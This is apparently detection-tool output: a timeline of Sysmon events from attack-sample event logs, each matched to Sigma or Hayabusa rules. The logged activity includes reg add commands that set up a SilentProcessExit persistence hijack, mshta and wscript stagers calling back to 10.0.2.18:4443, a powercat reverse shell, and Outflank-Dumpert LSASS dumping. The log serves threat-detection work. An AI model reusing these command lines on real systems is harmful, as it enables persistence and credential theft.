/stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet 
Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: 
SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence 
Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: 
C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 
365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 
17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: 
ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: 
ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 